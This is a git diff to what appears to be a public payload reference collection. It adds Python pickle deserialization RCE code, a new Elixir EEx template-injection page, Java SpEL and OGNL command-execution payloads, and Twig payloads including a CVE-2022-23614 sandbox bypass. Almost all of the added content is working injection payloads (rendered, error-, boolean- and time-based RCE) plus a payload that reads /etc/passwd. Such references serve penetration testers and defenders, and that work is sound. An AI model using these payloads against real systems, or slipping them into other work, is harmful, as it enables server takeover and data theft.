diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md index 5071e80488..e358bcc1d9 100644 --- a/Insecure Deserialization/Python.md +++ b/Insecure Deserialization/Python.md @@ -68,6 +68,28 @@ evil_token = b64encode(cPickle.dumps(e)) print("Your Evil Token : {}").format(evil_token) ``` +A universal payload can be created by loading `os` at runtime using eval: + +```python +import pickle +import base64 + +class RCE: + def __reduce__(self): + return eval, ("__import__('os').system('whoami')",) +pickled = pickle.dumps(RCE()) +print(base64.b64encode(pickled).decode()) +``` + +This approach allows running arbitrary python code, which allows us to use different techniques from code injection: + +```python +__import__('os').system('whoami') # Reflected RCE +getattr('', __import__('os').popen('whoami').read()) # Error-Based RCE +1 / (__include__("os").popen("id")._proc.wait() == 0) # Boolean-Based RCE +__include__("os").popen("id && sleep 5").read() # Time-Based RCE +``` + ### PyYAML YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures. @@ -111,3 +133,4 @@ with open('exploit_unsafeloader.yml') as file: * [Python Yaml Deserialization - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization) * [PyYAML Documentation - PyYAML - April 29, 2006](https://pyyaml.org/wiki/PyYAMLDocumentation) * [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf) +* [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 091de3b4ee..34a6bd9ed5 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -271,12 +271,12 @@ http:127.0.0.1/ ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) -Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/` +Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/`. * `urllib2` treats `1.1.1.1` as the destination * `requests` and browsers redirect to `2.2.2.2` * `urllib` resolves to `3.3.3.3` -* Some parsers replace http:127.0.0.1/ to http://127.0.0.1/ +* Some parsers replace `http:127.0.0.1/` to `http://127.0.0.1/` ### Bypass PHP filter_var() Function diff --git a/Server Side Template Injection/Elixir.md b/Server Side Template Injection/Elixir.md new file mode 100644 index 0000000000..cfe8cda1b9 --- /dev/null +++ b/Server Side Template Injection/Elixir.md @@ -0,0 +1,66 @@ +# Server Side Template Injection - Elixir + +> Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation. + +## Summary + +- [Templating Libraries](#templating-libraries) +- [Universal Payloads](#universal-payloads) +- [EEx](#eex) + - [EEx - Basic injections](#eex---basic-injections) + - [EEx - Retrieve /etc/passwd](#eex---retrieve-etcpasswd) + - [EEx - Remote Command execution](#eex---remote-command-execution) +- [References](#references) + +## Templating Libraries + +| Template Name | Payload Format | +|---------------|----------------| +| EEx | `<%= %>` | +| LEEx | `<%= %>` | +| HEEx | `<%= %>` | + +## Universal Payloads + +Generic code injection payloads work for many Elixir-based template engines, such as EEx, LEEx and HEEx. + +By default, only EEx can render templates from string, but it is possible to use LEEx and HEEx as replacement engines for EEx. + +To use these payloads, wrap them in the appropriate tag. + +```erlang +elem(System.shell("id"), 0) # Rendered RCE +[1, 2][elem(System.shell("id"), 0)] # Error-Based RCE +1/((elem(System.shell("id"), 1) == 0)&&1||0) # Boolean-Based RCE +elem(System.shell("id && sleep 5"), 0) # Time-Based RCE +``` + +## EEx + +[Official website](https://hexdocs.pm/eex/1.19.5/EEx.html) +> EEx stands for Embedded Elixir. + +### EEx - Basic injections + +```erlang +<%= 7 * 7 %> +``` + +### EEx - Retrieve /etc/passwd + +```erlang +<%= File.read!("/etc/passwd") %> +``` + +### EEx - Remote Command execution + +```erlang +<%= elem(System.shell("id"), 0) %> # Rendered RCE +<%= [1, 2][elem(System.shell("id"), 0)] %> # Error-Based RCE +<%= 1/((elem(System.shell("id"), 1) == 0)&&1||0) %> # Boolean-Based RCE +<%= elem(System.shell("id && sleep 5"), 0) %> # Time-Based RCE +``` + +## References + +- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index f261d791d2..4f6d898b52 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -35,6 +35,9 @@ - [SpEL - DNS Exfiltration](#spel---dns-exfiltration) - [SpEL - Session Attributes](#spel---session-attributes) - [SpEL - Command Execution](#spel---command-execution) +- [Object-Graph Navigation Language](#object-graph-navigation-language) + - [OGNL - Basic Injection](#ognl---basic-injection) + - [OGNL - Command Execution](#ognl---command-execution) - [References](#references) ## Templating Libraries @@ -46,7 +49,7 @@ | Groovy | `${ }` | | Jinjava | `{{ }}` | | Pebble | `{{ }}` | -| Spring | `*{ }` | +| SpEL | `*{ }`, `#{ }`, `${ }` | | Thymeleaf | `[[ ]]` | | Velocity | `#set($X="") $X` | @@ -367,9 +370,12 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val ### SpEL - Basic Injection +> SpEL has built-in templating system using `#{ }`, but SpEL is also commonly used for interpolation using `${ }`. + ```java ${7*7} ${'patt'.toString().replace('a', 'x')} +${T(java.lang.Integer).valueOf('1')} ``` ### SpEL - Retrieve Environment Variables @@ -440,6 +446,66 @@ ${pageContext.request.getSession().setAttribute("admin",true)} ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} ${request.getAttribute("a")} ``` + +- Error-Based payload: + + ```java + ${T(java.lang.Integer).valueOf("x"+T(java.lang.String).getConstructor(T(byte[])).newInstance(T(java.lang.Runtime).getRuntime().exec("id").inputStream.readAllBytes()))} + ``` + +- Boolean-Based payload: + + ```java + ${1/((T(java.lang.Runtime).getRuntime().exec("id").waitFor()==0)?1:0)+""} + ``` + +- Time-Based payload: + + ```java + ${(T(java.lang.Runtime).getRuntime().exec("id").waitFor().equals(0)?T(java.lang.Thread).sleep(5000):0).toString()} + ``` + +## Object-Graph Navigation Language + +[Official website](https://commons.apache.org/dormant/commons-ognl/) + +> OGNL stands for Object-Graph Navigation Language; it is an expression language for getting and setting properties of Java objects, plus other extras such as list projection and selection and lambda expressions. You use the same expression for both getting and setting the value of a property. + +### OGNL - Basic Injection + +> OGNL can be used with different tags like `${ }` + +```java +7*7 +'patt'.toString().replace('a', 'x') +@java.lang.Integer@valueOf('1') +``` + +### OGNL - Command Execution + +Rendered: + +```java +new String(@java.lang.Runtime@getRuntime().exec("id").getInputStream().readAllBytes()) +``` + +Error-Based: + +```java +(new String(@java.lang.Runtime@getRuntime().exec("id").getInputStream().readAllBytes()))/0 +``` + +Boolean-Based: + +```java +1/((@java.lang.Runtime@getRuntime().exec("id").waitFor()==0)?1:0)+"" +``` + +Time-Based: + +```java +((@java.lang.Runtime@getRuntime().exec("id").waitFor().equals(0))?@java.lang.Thread@sleep(5000):0) +``` ## References diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index 11caee80a3..97be31cd6c 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -47,9 +47,7 @@ system('id') // Error-Based RCE ini_set("error_reporting", "1") // Enable verbose fatal errors for Error-Based -fopen(join("", ["Y:/A:/", shell_exec('id')]), "r") -include(join("", ["Y:/A:/", shell_exec('id')])) -join("", ["xx", shell_exec('id')])() +call_user_func(join("", ["xx", shell_exec('id')])) // Boolean-Based RCE 1 / (pclose(popen("id", "wb")) == 0) @@ -163,6 +161,8 @@ $output = $twig > render ( {{_self.env.registerUndefinedFilterCallback("shell_exec")}}{{1/(_self.env.getFilter("id && echo UniqueString")|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE <= 1.19 {{1/({"id && echo UniqueString":"shell_exec"}|map("call_user_func")|join|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE >=1.41, >=2.10, >=3.0 + +{% set a = ["error_reporting", "1"]|sort("ini_set") %}{% set b = ["ob_start", "call_user_func"]|sort("call_user_func") %}{{ ["id", 0]|sort("system") }}{% set a = ["ob_end_flush", []]|sort("call_user_func_array")%} // Error-Based RCE with sandbox bypass using CVE-2022-23614 {{ 1 / (["id >>/dev/null && echo -n 1", "0"]|sort("system")|first == "0") }} // Boolean-Based RCE with sandbox bypass using CVE-2022-23614 ```